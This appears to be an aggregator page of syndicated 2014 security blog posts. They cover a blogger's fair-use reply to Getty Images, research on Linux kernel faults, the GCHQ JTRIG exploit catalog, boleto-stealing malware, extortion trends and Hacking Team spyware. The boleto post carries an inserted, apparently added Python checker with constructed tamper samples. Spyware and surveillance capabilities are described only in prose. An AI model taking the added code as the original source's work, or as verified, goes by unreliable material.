I strongly believe that Getty Images is using a “cookie cutter” style of complaint and is not actually interested in any lawsuit; they just want to extort money from people who don’t know their rights or don’t have the fortitude for a long defense (SLAPP). Getty Images made no effort to evaluate the content beyond an automated search bot, made no attempt to review the bot’s results, provided no evidence that they are the copyright holder, provided no proof that they tried to verify licenses, and threatened legal action against me if I did not pay up.

I am glad that I stood up for my First Amendment rights.

LWN.net: Faults in Linux 2.6

This post was syndicated from: LWN.net and was written by: jake. Original post: at LWN.net

Six researchers (including Julia Lawall of the Coccinelle project) have just released a paper [PDF] (abstract) that looks at the faults in the 2.6 kernel. “In August 2011, Linux entered its third decade. Ten years before, Chou et al. published a study of faults found by applying a static analyzer to Linux versions 1.0 through 2.4.1. A major result of their work was that the drivers directory contained up to 7 times more of certain kinds of faults than other directories. This result inspired numerous efforts on improving the reliability of driver code. Today, Linux is used in a wider range of environments, provides a wider range of services, and has adopted a new development and release model. What has been the impact of these changes on code quality? To answer this question, we have transported Chou et al.’s experiments to all versions of Linux 2.6, released between 2003 and 2011. We find that Linux has more than doubled in size during this period, but the number of faults per line of code has been decreasing. Moreover, the fault rate of drivers is now below that of other directories, such as arch. These results can guide further development and research efforts for the decade to come. To allow updating these results as Linux evolves, we define our experimental protocol and make our checkers available.”
(Thanks to Asger Alstrup Palm.)

LWN.net: [$] Genealogy research with Gramps

This post was syndicated from: LWN.net and was written by: n8willis. Original post: at LWN.net

Genealogy is a fairly popular pursuit, and those wishing to use open-source software in their hobby have their choice cut-out for them—Gramps is the only complete, actively-developed free-software solution. The project was started in 2001 and initially known as GRAMPS; the first stable release was in 2004. The latest, version 4.1.0 (“Name go in book”) was released on June 18.

Schneier on Security: Security Against Traffic Analysis of Cloud Data Access

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Here’s some interesting research on foiling traffic analysis of cloud storage systems.

Press release.

The Hacker Factor Blog: Dear Getty Images Legal Department

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few years, Getty Images has operated an aggressive anti-copyright infringement campaign. In 2011, they purchased PicScout to search the Internet for potential unlicensed uses of their pictures. Then they began sending out very scary-sounding takedown notices. These letters include a “cease and desist” paragraph as well as a bill for the unauthorized use.

I just received one of these letters. Here’s the 7-page (3.4 MB) letter: PDF. (The only thing I censored was the online access code for paying online.) They billed me $475 for a picture used on my blog. (If you log into their site, it’s $488 with tax.)

A number of news outlets as well as the blogosphere have begun reporting on these letters from Getty Images. For example:

  • International Business Times: “Getty Images Lawsuits: Enforcement Or Trolling? Fear Of Letters Dwindling, Stock-Photo Giant Hits Federal Courts”

  • The DG Group: “Image Copyright Infringement And Getty Images Scam Letter”
  • Extortion Letter Info: “Reporting on Getty Images & Stock Photo Settlement Demand Letters (Copyright Trolls, ‘Extortion’ Letters, ‘Shadown’ Letters)”
  • Women in Business: “Are You Being Set Up For Copyright Infringement? As Technology Becomes More Invasive Copyright Infringement Scams Flourish”
  • RyanHealy.com: “Getty Images Extortion Letter”
  • someguy72 @ Reddit: He states that he purchased the pictures legally from Getty and still received an infringement notice. His advice: if you purchase a picture from Getty, “save your records FOREVER… they will come after you, years later and you might not have PROOF of PURCHASE, and then you will be screwed.”

As far as I can tell, this is an extortion racket. (I’m surprised that there hasn’t been a class-action lawsuit against Getty Images yet.) The basic premise is that they send out a threatening letter with a price tag. Some people will fear the strongly-worded letter and simply pay the amount. If you ignore it, then they send more letters with greater dollar amounts. If you call them up, the forums say that you can usually negotiate a lower amount. However, sometimes you may not actually owe anything at all.

Many people have reported that, if you just ignore it, then it goes away. However, Getty Images has sued a few people who ignored the letters. If you ignore it, then you place yourself at risk.

But here’s the thing… There are some situations where you can use the image without a license. It is in the Copyright law under the heading “Fair Use” (US Copyright Law Title 17 Section 107; in some countries, it’s called “Fair Dealing”). This is an exception from copyright enforcement. Basically, if you’re using the picture as art on your web site or to promote a product, then you are violating their copyright. (You should negotiate a lower rate.) However, if you use it for criticism, comment, news reporting, teaching, scholarship, or research, then you are allowed to use the picture.

For example, I have many blog entries where I forensically evaluate pictures. I do this to show techniques, criticize content, identify deceptive practices, etc. If Fair Use did not exist, then I would be unable to criticize or expose deception from media outlets. In effect, they would be censoring my freedom of speech by preventing me from directly addressing the subject.

Reply To Getty

The picture in question is one that is on an older blog entry: In The Flesh. This blog entry criticizes the media outlets Time and Salon for promoting misleading and hostile software. (It’s hostile because the demo software installs malware.) The software, False Flesh, claims to make people in any picture appear nude. The pictures in my blog entry are used to demonstrate some of the deceptive practices. Specifically, the pictures of nude women on the software’s web site did not come from their software.

I looked at the picture mentioned in Getty’s complaint and how it was being used in the blog entry. I really thought it was permitted under Copyright Fair Use. However, I’m not an attorney. So… I checked with an attorney about the Getty complaint and my use of the picture. I was actually surprised that he didn’t start his answer with “that depends…” (If you’ve ever worked with an attorney, then you know any discussion about legality begins with them saying “that depends…”) Instead, he said outright “it’s clearly fair use.”

Personally, I’m offended that Getty Images made no attempt to look at the context in which the picture is used.

Rather than ignoring them, I sent them a letter:

Dr. Neal Krawetz
Hacker Factor
PO Box 270033
Fort Collins, CO
80527-0033

July 15, 2014

Legal Department
Getty Images
605 5th Ave S, Suite 400
Seattle, WA
98104

Dear Getty Images Legal Department,

I received your copyright infringement notification dated “7/10/2014 11:05:06 AM”, case number 371842247, on July 14, 2014. I have reviewed the image, the use of the picture on my web site, and discussed this situation with an attorney. It is my strong belief that I am clearly using the picture within the scope of Copyright Fair Use (Title 17 Section 107).

Specifically:

  • The blog entry, titled “In The Flesh”, criticizes the media outlets Time and Salon for promoting deceptive software. The software is called “False Flesh” and claims to turn any photo of a person into a nude. I point out that installing the False Flesh demo software will install malware.

  • The blog entry discloses research findings regarding the False Flesh software: there is no identified owner for the software and the sample pictures they use to demonstrate their software are not from their software. I specifically traced their sample images to pictures from sites such as Getty Images. I forensically evaluate the pictures and explicitly point out the misrepresentation created by these images on the False Flesh web site.
  • The picture is used on my web site to criticize the media reports by exposing fraud and misrepresentation associated with the product. It is also included as part of a demonstration for tracking and identifying potentially fraudulent products in general.
  • The blog entry reports on these findings to the public in order to educate people regarding the deceptive nature of False Flesh and the risks from using this software.
  • The image that you identified is not used in the blog entry to promote any products or services and is directly related to the comments, criticism, and research covered in the blog entry. The use is not commercial in nature. This goes toward the purpose and character, which is to identify fraud and misrepresentation in a product promoted by Time and Salon.
  • As described in the blog entry, I found sample images on the False Flesh web site and used TinEye and other forensic methods to identify the sources. This was used to prove that the False Flesh software did not generate any of their sample images.
  • I did not use the full-size version of this particular picture and it includes the Getty Images Image Bank watermark. The blog entry explicitly identifies that the source for the False Flesh picture was Getty Images and not False Flesh. I point out that False Flesh used the picture in a deceptive manner.
  • I believe that my use of this picture has no adverse effect on the potential market for the image.

I believe that this covers the Copyright Fair Use requirements for criticism, comment, teaching, research, and reporting.

Getty Images acknowledges Fair Use in their FAQ concerning license requirements:
http://company.gettyimages.com/license-compliance/faq/#are-there-limitations-on-a-copyright-owners-rights

Specifically, Getty Images calls out education and research. As a computer security and forensic researcher, I use this blog to describe tools and techniques, evaluate methodologies, and to identify deceptive practices. I believe that this specific blog entry, and my blog in general, clearly fit both of these areas.

As stated in this letter, the picture’s appearance on my blog is Fair Use and I have the right under copyright law to use the image without your consent. This letter serves as notice that any DMCA takedown or blocking notices to any third party would be in bad faith.

Sincerely,

/s/ Dr. Neal Krawetz

Chilling Effect

My blog in general reports on findings related to computer security and forensics. Many of these blog entries heavily focus on scams, fraud, and abuse from media outlets. Many of my blog entries (reports) have been repeated by news outlets, and some of my blog entries have had a direct effect on changing insecure and unethical practices. This includes a series of blog entries that exposed digital manipulation in World Press Photo’s annual contest (influencing changes in this year’s contest rules) and a paper on fundamental problems with credit card payment systems that led to changes in the Visa security standards.

While this could be a wide-spread extortion racket, it could also be Getty’s way of testing the waters before going after some blog entries where I openly and explicitly criticize them for releasing digitally altered photos.

My primary concern is the chilling effect this could have. If I pay the extortion, then it opens me for more claims from Getty; I have previously criticized them for providing digitally altered photos and performed analysis to prove it. It also opens the way for similar claims from the Associated Press, Reuters, and every other media outlet that I have openly criticized. All of my blog entries that explicitly expose digital misrepresentation, report on media manipulation, and even those that disclose methods for evaluating content will be at risk.

In effect, bowing to this one threatening letter would force me to close my blog since I would no longer be allowed to freely write — report, comment, disclose research, and educate others — on topics related to media manipulation and digital photo analysis. I consider Getty’s attempt to censor my blog’s content to be an unacceptable attack on my freedom of speech.

LWN.net: Google’s “Project Zero”

This post was syndicated from: LWN.net and was written by: corbet. Original post: at LWN.net

Google’s newly announced Project Zero is focused on making the net as a whole safer from attackers. “We’re not placing any particular bounds on this project and will work to improve the security of any software depended upon by large numbers of people, paying careful attention to the techniques, targets and motivations of attackers. We’ll use standard approaches such as locating and reporting large numbers of vulnerabilities. In addition, we’ll be conducting new research into mitigations, exploitation, program analysis—and anything else that our researchers decide is a worthwhile investment.” Their policy of only reporting bugs to the vendor looks like it could result in the burying of inconvenient vulnerabilities, but presumably they have thought about that.

TorrentFreak: File-Sharing Doesn’t Hurt Box Office Revenue, Research Finds

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Research into online piracy comes in all shapes and sizes, often with equally mixed results. Often the main question is whether piracy is hurting sales.

A new study conducted by economist Koleman Strumpf is one of the most comprehensive on the subject so far.

Drawing on data from a popular BitTorrent tracker and revenue projections from the Hollywood Stock Exchange he researches how the release of a pirated movie affects expected box office income.

The research covers 150 of the most popular films that were released over a period of seven years, and the findings reveal that the release of pirated films on file-sharing sites doesn’t directly hurt box office revenue.

“There is no evidence in my empirical results of file-sharing having a significant impact on theatrical revenue,” Strumpf tells TorrentFreak in a comment.

“My best guess estimate is that file sharing reduced the first month box office by $200 million over 2003-2009, which is only three tenths of a percent of what movies actually earned. I am unable to reject the hypothesis that there is no impact at all of file-sharing on revenues.”

So while there is a small negative effect, this is limited to three tenths of a percent and not statistically significant.

Interestingly, the data also reveals that movie leaks shortly before the premiere have a small positive impact on expected revenues. This suggests that file-sharing may serve as a form of promotion.

“One consistent result is that file-sharing arrivals shortly before the theatrical opening have a modest positive effect on box office revenue. One explanation is that such releases create greater awareness of the film. This is also the period of heaviest advertising,” Strumpf notes.

One of the advantages of this study compared to previous research is that it measures the direct effect of a movie leak on projected box office revenues. Previous studies mostly compared early versus late leaks, which is less accurate and may be influenced by other factors.

“For example, suppose studios added extra security to big budget movies which then have a delayed arrival to file-sharing networks. Then even if file-sharing has no impact at all, one would find that delayed arrival on file-sharing leads to higher revenues,” Strumpf tells us.

Another upside of the research lies in the statistical precision. The data includes thousands of daily observations and relatively precise estimates, something lacking in most previous studies.

The downside, on the other hand, is that the expected box office impact is estimated from the Hollywood Stock Exchange. While this has shown to be a good predictor for actual revenues, it’s not a direct measurement.

In any case, the paper suggests that file-sharing might not be the biggest threat the movie industry is facing.

Even if the negative effects were twice as big as the data suggests, it would still be less than the $500 million Hollywood spent on the MPAA’s anti-piracy efforts during the same period.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

Schneier on Security: GCHQ Catalog of Exploit Tools

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

The latest Snowden story is a catalog of exploit tools from JTRIG (Joint Threat Research Intelligence Group), a unit of the British GCHQ, for both surveillance and propaganda. It’s a list of code names and short descriptions, such as these:

GLASSBACK: Technique of getting a target’s IP address by pretending to be a spammer and ringing them. Target does not need to answer.

MINIATURE HERO: Active skype capability. Provision of real time call records (SkypeOut and SkypetoSkype) and bidirectional instant messaging. Also contact lists.

MOUTH: Tool for collection for downloading a user’s files from Archive.org.

PHOTON TORPEDO: A technique to actively grab the IP address of MSN messenger user.

SILVER SPECTOR: Allows batch Nmap scanning over Tor.

SPRING BISHOP: Find private photographs of targets on Facebook.

ANGRY PIRATE: is a tool that will permanently disable a target’s account on their computer.

BUMPERCAR+: is an automated system developed by JTRIG CITD to support JTRIG BUMPERCAR operations. BUMPERCAR operations are used to disrupt and deny Internet-based terror videos or other materials. The technique employs the services provided by upload providers to report offensive materials.

BOMB BAY: is the capacity to increase website hits/rankings.

BURLESQUE: is the capacity to send spoofed SMS messages.

CLEAN SWEEP: Masquerade Facebook Wall Posts for individuals or entire countries.

CONCRETE DONKEY: is the capacity to scatter an audio message to a large number of telephones, or repeatedly bomb a target number with the same message.

GATEWAY: Ability to artificially increase traffic to a website.

GESTATOR: amplification of a given message, normally video, on popular multimedia websites (Youtube).

SCRAPHEAP CHALLENGE: Perfect spoofing of emails from Blackberry targets.

SUNBLOCK: Ability to deny functionality to send/receive email or view material online.

SWAMP DONKEY: is a tool that will silently locate all predefined types of file and encrypt them on a target’s machine.

UNDERPASS: Change outcome of online polls (previously known as NUBILO).

WARPATH: Mass delivery of SMS messages to support an Information Operations campaign.

HAVLOCK: Real-time website cloning techniques allowing on-the-fly alterations.

HUSK: Secure one-on-one web based dead-drop messaging platform.

There’s lots more. Go read the rest. This is a big deal, as big as the TAO catalog from December.

I would like to post the entire list. If someone has a clever way of extracting the text, or wants to retype it all, please send it to me.

EDITED TO ADD (7/16): HTML of the entire catalog is here.

Krebs on Security: Brazilian ‘Boleto’ Bandits Bilk Billions

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

With the eyes of the world trained on Brazil for the 2014 FIFA World Cup, it seems a fitting time to spotlight a growing form of computer fraud that’s giving Brazilian banks and consumers a run for their money. Today’s post looks at new research into a mostly small-time cybercrime practice that in the aggregate appears to have netted thieves the equivalent of billions of dollars over the past two years.

A boleto.

At issue is the “boleto” (officially “Boleto Bancario”), a popular payment method in Brazil that is used by consumers and for most business-to-business payments. Brazilians can use boletos to complete online purchases via their bank’s Web site, but unlike credit card payments — which can be disputed and reversed — payments made via boletos are not subject to chargebacks and can only be reverted by bank transfer.

Brazil has an extremely active and talented cybercrime underground, and increasingly Brazilian organized crime gangs are setting their sights on boleto users who bank online. This is typically done through malware that lies in wait until the user of the hacked PC visits their bank’s site and fills out the account information for the recipient of a boleto transaction. In this scenario, the unwitting victim submits the transfer for payment and the malware modifies the request by substituting a recipient account that the attackers control.

Many of the hijacked boleto transactions are low-dollar amounts, but in the aggregate these purloined payments can generate an impressive income stream for even a small malware gang. On Tuesday, for example, a source forwarded me a link to a Web-based control panel for a boleto-thieving botnet (see screenshot below); in this operation, we can see that the thieves had hijacked some 383 boleto transactions between February 2014 and the end of June, but had stolen the equivalent of nearly USD $250,000 during that time.

The records kept by a boleto-stealing botnet. Next to the date and time is the account of the intended recipient of the transfer; the “linha alterada” column shows the accounts used by the thieves to accept diverted payments. “Valor” refers to the amount, expressed in Brazilian Real.

But a recent discovery by researchers at RSA, the security division of EMC, exposes far more lucrative and ambitious boleto banditry. RSA says the fraud ring it is tracking — known as the “Bolware” operation — affects more than 30 different banks in Brazil, and may be responsible for up to $3.75 billion USD in losses. RSA arrived at this estimate based on the discovery of a similar botnet control panel that tracked nearly a half-million fraudulent transactions.

Most Brazilian banks require online banking customers to install a security plug-in that hooks into the user’s browser. The plug-ins are designed to help block malware attacks. But according to RSA, the Bolware gang’s malware successfully disables those security plug-ins, leaving customers with a false sense of security when banking online.

The malware also harvests usernames and passwords from victim PCs, credentials that are thought to be leveraged in spreading the malware via spam to the victim’s contacts. RSA said this fraud gang appears to have infected more than 192,000 PCs, and stolen at least 83,000 sets of user credentials.

Administration screen of the Bolware gang shows the original Boleto numbers “Bola Original” and their destination bank “Bola”. Image: RSA

RSA notes that the miscreants responsible for the Bolware operation appear to have used just over 8,000 separate accounts to receive the stolen funds. That’s roughly 7,997 more accounts than were used by the boleto bandits responsible for the diverted transactions in the boleto botnet control panel I discovered.

Researchers at RSA suggest that Brazilians who wish to transact in boletos online should consider using a mobile device to manage their boleto transactions, noting that boleto-thieving malware currently is not capable of altering the data stored in the barcode of each hijacked boleto order — at least for the time being.

“As the malware does not alter the barcode (for now), the safest approach is to use mobile banking applications available on smart phones (for now, immune to this malware) to read the barcode and to make payments,” the company said in its report (PDF) on this crime wave.
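The post above describes malware that rewrites the payee data in a boleto request while leaving the printed barcode untouched, which is why RSA recommends paying by scanning the barcode. One defender-side check that follows from that observation is to reconcile the typed line (linha digitável) shown on screen against the digits decoded from the barcode image: both are derived from the same 44 digits, so a substituted account shows up either as a failed check digit or as a disagreement between the two forms. The Python below is an added example written for this page, not code from Krebs, RSA or any bank. It assumes the public FEBRABAN layout (a 44-digit barcode of bank, currency, general check digit, due-date factor, amount and a 25-digit bank-specific free field; a 47-digit typed line made of three mod-10-checked fields, the mod-11 general check digit and the factor-plus-amount block); the sample typed line is the worked example reproduced in public boleto layout documentation, used here only as test data, and the two tampered lines are constructed.

```python
"""Reconcile a boleto's typed line (linha digitavel) against its barcode.

Added example for this page; not code from Krebs, RSA or any bank. The field
layout below is the public FEBRABAN boleto layout as assumed here:
  barcode (44 digits): bank[0:3] currency[3] general DV[4] factor[5:9]
                       amount[9:19] free field[19:44]
  typed line (47 digits): field1 (9 digits + mod-10 DV), field2 (10 + DV),
                       field3 (10 + DV), general DV, factor + amount (14)
Check the boundaries against the official layout before relying on them.
"""


def mod10_check_digit(digits: str) -> int:
    """FEBRABAN mod-10: weights 2,1,2,1,... from the right, summing the digits
    of each product, then the distance to the next multiple of ten."""
    total, weight = 0, 2
    for ch in reversed(digits):
        prod = int(ch) * weight
        total += prod // 10 + prod % 10  # digit sum of the product (max 18)
        weight = 1 if weight == 2 else 2
    return (10 - total % 10) % 10


def mod11_general_check_digit(body43: str) -> int:
    """General barcode DV over the 43 digits that exclude index 4: weights
    2..9 cycling from the right; a result of 0, 10 or 11 becomes 1."""
    total, weight = 0, 2
    for ch in reversed(body43):
        total += int(ch) * weight
        weight = 2 if weight == 9 else weight + 1
    dv = 11 - total % 11
    return 1 if dv in (0, 10, 11) else dv


def build_barcode(bank: str, currency: str, factor: str,
                  amount_cents: int, free_field: str) -> str:
    """Assemble the 44-digit barcode, computing its general check digit."""
    body = bank + currency + factor + f"{amount_cents:010d}" + free_field
    if len(body) != 43 or not body.isdigit():
        raise ValueError("barcode body must be 43 digits before the DV")
    return body[:4] + str(mod11_general_check_digit(body)) + body[4:]


def typed_line_from_barcode(barcode: str) -> str:
    """Derive the 47-digit typed line a genuine bill prints from its barcode."""
    f1 = barcode[0:4] + barcode[19:24]   # bank + currency + free field 1-5
    f2 = barcode[24:34]                  # free field 6-15
    f3 = barcode[34:44]                  # free field 16-25
    return (f1 + str(mod10_check_digit(f1))
            + f2 + str(mod10_check_digit(f2))
            + f3 + str(mod10_check_digit(f3))
            + barcode[4]                 # general DV
            + barcode[5:19])             # factor + amount


def barcode_from_typed_line(digits47: str) -> str:
    """Invert the mapping: rebuild the 44 barcode digits from a typed line."""
    f1, f2, f3 = digits47[0:9], digits47[10:20], digits47[21:31]
    general_dv, factor_amount = digits47[32], digits47[33:47]
    return f1[:4] + general_dv + factor_amount + f1[4:] + f2 + f3


def reconcile(typed_line: str, barcode: str) -> list[str]:
    """Return findings; an empty list means every check digit verifies and the
    typed line describes exactly the scanned barcode."""
    digits = typed_line.replace(".", "").replace(" ", "")
    if len(digits) != 47 or not digits.isdigit():
        return ["typed line is not 47 digits"]
    if len(barcode) != 44 or not barcode.isdigit():
        return ["barcode is not 44 digits"]
    findings = []
    for name, field, dv in (("field1", digits[0:9], digits[9]),
                            ("field2", digits[10:20], digits[20]),
                            ("field3", digits[21:31], digits[31])):
        if mod10_check_digit(field) != int(dv):
            findings.append(f"{name} mod-10 check digit mismatch")
    if mod11_general_check_digit(barcode[:4] + barcode[5:]) != int(barcode[4]):
        findings.append("barcode general check digit mismatch")
    if barcode_from_typed_line(digits) != barcode:
        findings.append("typed line does not describe the scanned barcode")
    return findings


# Sample data: the worked example from public boleto layout documentation
# (test data only, not a real bill). A genuine bill carries both forms.
GENUINE_LINE = "00190.50095 40144.816069 06809.350314 3 37370000000100"
GENUINE_BARCODE = "00193373700000001000500940144816060680935031"

# Two constructed tamper cases modelled on the post: the payee-identifying
# free-field digits in field2 are overwritten, first without fixing the
# check digit, then with the mod-10 digit recomputed by a more careful forger.
NAIVE_TAMPER = "00190.50095 99999.999999 06809.350314 3 37370000000100"
CAREFUL_TAMPER = "00190.50095 99999.999990 06809.350314 3 37370000000100"

if __name__ == "__main__":
    for label, line in (("genuine", GENUINE_LINE), ("naive", NAIVE_TAMPER),
                        ("careful", CAREFUL_TAMPER)):
        print(label, reconcile(line, GENUINE_BARCODE) or ["ok"])
```

The check digits alone catch only careless substitution; a forger who recomputes the mod-10 digits produces a typed line that validates on its own, which is why the comparison against the independently scanned barcode is the part that matters.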

Schneier on Security: How Traffic Shaping Can Help the NSA Evade Legal Oversight

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

New research paper on how the NSA can evade legal prohibitions against collecting Internet data and metadata on Americans by forcing domestic traffic to leave and return to the US. The general technique is called “traffic shaping,” and has legitimate uses in network management.

From a news article:

The Obama administration previously said there had been Congressional and Judicial oversight of these surveillance laws — notably Section 215 of the Patriot Act, which authorized the collection of Americans’ phone records; and Section 702 of the Foreign Intelligence Surveillance Act (FISA), which authorized the controversial PRISM program to access non-U.S. residents’ emails, social networking, and cloud-stored data.

But the researchers behind this new study say that the lesser-known Executive Order (EO) 12333, which remains solely the domain of the Executive Branch — along with United States Signals Intelligence Directive (USSID) 18, designed to regulate the collection of Americans’ data from surveillance conducted on foreign soil — can be used as a legal basis for vast and near-unrestricted domestic surveillance on Americans.

The legal provisions offered under EO 12333, which the researchers say “explicitly allows for intentional targeting of U.S. persons” for surveillance purposes when FISA protections do not apply, was the basis of the authority that reportedly allowed the NSA to tap into the fiber cables that connected Google and Yahoo’s overseas to U.S. data centers.

An estimated 180 million user records, regardless of citizenship, were collected from Google and Yahoo data centers each month, according to the leaked documents. The program, known as Operation MUSCULAR, was authorized because the collection was carried out overseas and not on U.S. soil, the researchers say.

The paper also said surveillance can be carried out across the wider Internet by routing network traffic overseas so it no longer falls within the protection of the Fourth Amendment.

We saw a clumsy example of this in 2013, when a bunch of Internet traffic was mysteriously routed through Iceland. That one was the result of hacking the Border Gateway Protocol (BGP). I assure you that the NSA’s techniques are more effective and less obvious.

Krebs on Security: 2014: The Year Extortion Went Mainstream

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The year 2014 may well go down in the history books as the year that extortion attacks went mainstream. Fueled largely by the emergence of the anonymous online currency Bitcoin, these shakedowns are blurring the lines between online and offline fraud, and giving novice computer users a crash course in modern-day cybercrime.

An extortion letter sent to 900 Degrees Neapolitan Pizzeria in New Hampshire.

At least four businesses recently reported receiving “Notice of Extortion” letters in the U.S. mail. The letters say the recipient has been targeted for extortion, and threaten a range of negative publicity, vandalism and harassment unless the target agrees to pay a “tribute price” of one bitcoin (currently ~USD $561) by a specified date. According to the letter, that tribute price increases to 3 bitcoins (~$1,683) if the demand isn’t paid on time.

The ransom letters, which appear to be custom written for restaurant owners, threaten businesses with negative online reviews, complaints to the Better Business Bureau, harassing telephone calls, telephone denial-of-service attacks, bomb threats, fraudulent delivery orders, vandalism, and even reports of mercury contamination.

The missive encourages recipients to sign up with Coinbase – a popular bitcoin exchange – and to send the funds to a unique bitcoin wallet specified in the letter and embedded in the QR code that is also printed on the letter.

Interestingly, all three letters I could find that were posted online so far targeted pizza stores. At least two of them were mailed from Orlando, Florida.

The letters all say the amounts are due either on Aug. 1 or Aug. 15. Perhaps one reason the deadlines are so far off is that the attackers understand that not everyone has bitcoins, or even knows about the virtual currency.

“What the heck is a BitCoin?” wrote the proprietors of New Hampshire-based 900 Degrees Neapolitan Pizzeria, which posted a copy of the letter (above) on their Facebook page.

Sandra Alhilo, general manager of Pizza Pirates in Pomona, Calif., received the extortion demand on June 16.

“At first, I was laughing because I thought it had to be a joke,” Alhilo said in a phone interview. “It was funny until I went and posted it on our Facebook page, and then people put it on Reddit and the Internet got me all paranoid.”

Nicholas Weaver, a researcher at the International Computer Science Institute (ICSI) and at the University California, Berkeley, said these extortion attempts cost virtually nothing and promise a handsome payoff for the perpetrators.

“From the fraudster’s perspective, the cost of these attacks is a stamp and an envelope,” Weaver said. “This type of attack could be fairly effective. Some businesses — particularly restaurant establishments — are very concerned about negative publicity and reviews. Bad Yelp reviews, tip-offs to the health inspector… that stuff works and isn’t hard to do.”

While some restaurants may be an easy mark for this sort of crime, Weaver said the extortionists in this case are tangling with a tough adversary — The U.S. Postal Service — which takes extortion crimes perpetrated through the U.S. mail very seriously.

“There is a lot of operational security that these guys might have failed at, because this is interstate commerce, mail fraud, and postal inspector territory, where the gloves come off,” Weaver said. “I’m willing to bet there are several tools available to law enforcement here that these extortionists didn’t consider.”

It’s not entirely clear if or why extortionists seem to be picking on pizza establishments, but it’s probably worth noting that the grand-daddy of all pizza joints – Domino’s Pizza in France — recently found itself the target of a pricey extortion attack earlier this month after hackers threatened to release the stolen details on more than 650,000 customers if the company failed to pay a ransom of approximately $40,000.

Meanwhile, Pizza Pirates’s Alhilo says the company has been working with the local U.S. Postal Inspector’s office, which was very interested in the letter. Alhilo said her establishment won’t be paying the extortionists.

“We have no intention of paying it,” she said. “Honestly, if it hadn’t been a slow day that Monday I might have just thrown the letter out because it looked like junk mail. It’s annoying that someone would try to make a few bucks like this on the backs of small businesses.”

A GREAT CRIME FOR CRIMINALS

Fueled largely by the relative anonymity of cryptocurrencies like Bitcoin, extortion attacks are increasingly being incorporated into all manner of cyberattacks today. Today’s thieves are no longer content merely to hijack your computer and bandwidth and steal all of your personal and financial data; increasingly, these crooks are likely to hold all of your important documents for ransom as well.

“In the early days, they’d steal your credit card data and then threaten to disclose it only after they’d already sold it on the underground,” said Alan Paller, director of research at the SANS Institute, a Bethesda, Md. based security training firm. “But today, extortion is the fastest way for the bad guys to make money, because it’s the shortest path from cybercrime to cash. It’s really a great crime for the criminals.”

Last month, the U.S. government joined private security companies and international law enforcement partners to dismantle a criminal infrastructure responsible for spreading Cryptolocker, a ransomware scourge that the FBI estimates stole more than $27 million from victims compromised by the file-encrypting malware.

Even as the ink was still drying on the press releases about the Cryptolocker takedown, a new variant of Cryptolocker — Cryptowall — was taking hold. These attacks encrypt the victim PC’s hard drive unless and until the victim pays an arbitrary amount specified by the perpetrators — usually a few hundred dollars worth of bitcoins. Many victims without adequate backups in place (or those whose backups also were encrypted) pay up. Others, like the police department in the New Hampshire hamlet of Durham, are standing their ground.

The downside to standing your ground is that — unless you have backups of your data — the encrypted information is gone forever. When these attacks hit businesses, the results can be devastating. Code-hosting and project management services provider CodeSpaces.com was forced to shut down this month after a hacker gained access to its Amazon EC2 account and deleted most data, including backups. According to Computerworld, the devastating security breach happened over a span of 12 hours and initially started with a distributed denial-of-service attack followed by an attempt to extort money from the company.

A HIDDEN CRIME

Extortion attacks against companies operating in the technology and online space are nothing new, of course. Just last week, news came to light that mobile phone giant Nokia in 2007 paid millions to extortionists who threatened to reveal an encryption key to Nokia’s Symbian mobile phone source code.

Trouble is, the very nature of these scams makes it difficult to gauge their frequency or success.

“The problem with extortion is that the money is paid in order to keep the attack secret, and so if the attack is successful, there is no knowledge of the attack even having taken place,” SANS’s Paller said.

Traditionally, the hardest part about extortion has been getting paid and getting away with the loot. In the case of the crooks who extorted Nokia, the company paid the money, reportedly leaving the cash in a bag at an amusement park car lot. Police were tracking the drop-off location, but ultimately lost track of the blackmailers.

Anonymous virtual currencies like Bitcoin not only make it easier for extortionists to get paid, but they also make it easier and more lucrative for more American blackmailers to get in on the action. Prior to Bitcoin’s rise in popularity, the principal way that attackers extracted their ransom was by instructing victims to pay by wire transfer or reloadable prepaid debit cards — principally Greendot cards sold at retailers, convenience stores and pharmacies.

But unlike Bitcoin payments, these methods of cashing out are easily traceable if cashed out within the United States, the ICSI’s Weaver said.

“Bitcoin is their best available tool if they’re located in the United States,” Weaver said of extortionists. “Western Union can be traced at U.S. cashout locations, as can Greendot payments. Which means you either need an overseas partner [who takes half of the profit for his trouble] or Bitcoin.”

Schneier on Security: More on Hacking Team’s Government Spying Software

This post was syndicated from: Schneier on Security and was written by: schneier. Original post: at Schneier on Security

Hacking Team is an Italian malware company that sells exploit tools to governments. Both Kaspersky Lab and Citizen Lab have published detailed reports on its capabilities against Android, iOS, Windows Mobile, and BlackBerry smart phones.

They allow, for example, for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data. They can take screenshots, record audio from the phones to monitor calls or ambient conversations, hijack the phone’s camera to snap pictures or piggyback on the phone’s GPS system to monitor the user’s location. The Android version can also enable the phone’s Wi-Fi function to siphon data from the phone wirelessly instead of using the cell network to transmit it. The latter would incur data charges and raise the phone owner’s suspicion.

[...]

Once on a system, the iPhone module uses advanced techniques to avoid draining the phone’s battery, turning on the phone’s microphone, for example, only under certain conditions.

“They can just turn on the mic and record everything going on around the victim, but the battery life is limited, and the victim can notice something is wrong with the iPhone, so they use special triggers,” says Costin Raiu, head of Kaspersky’s Global Research and Analysis team.

One of those triggers might be when the victim’s phone connects to a specific WiFi network, such as a work network, signaling the owner is in an important environment. “I can’t remember having seen such advanced techniques in other mobile malware,” he says.

Hacking Team’s mobile tools also have a “crisis” module that kicks in when they sense the presence of certain detection activities occurring on a device, such as packet sniffing, and then pause the spyware’s activity to avoid detection. There is also a “wipe” function to erase the tool from infected systems.

Hacking Team claims to sell its tools only to ethical governments, but Citizen Lab has found evidence of their use in Saudi Arabia. It can’t be certain the Saudi government is a customer, but there’s good circumstantial evidence. In general, circumstantial evidence is all we have. Citizen Lab has found Hacking Team servers in many countries, but it’s a perfectly reasonable strategy for Country A to locate its servers in Country B.

And remember, this is just one example of government spyware. Assume that the NSA — as well as the governments of China, Russia, and a handful of other countries — have their own systems that are at least as powerful.

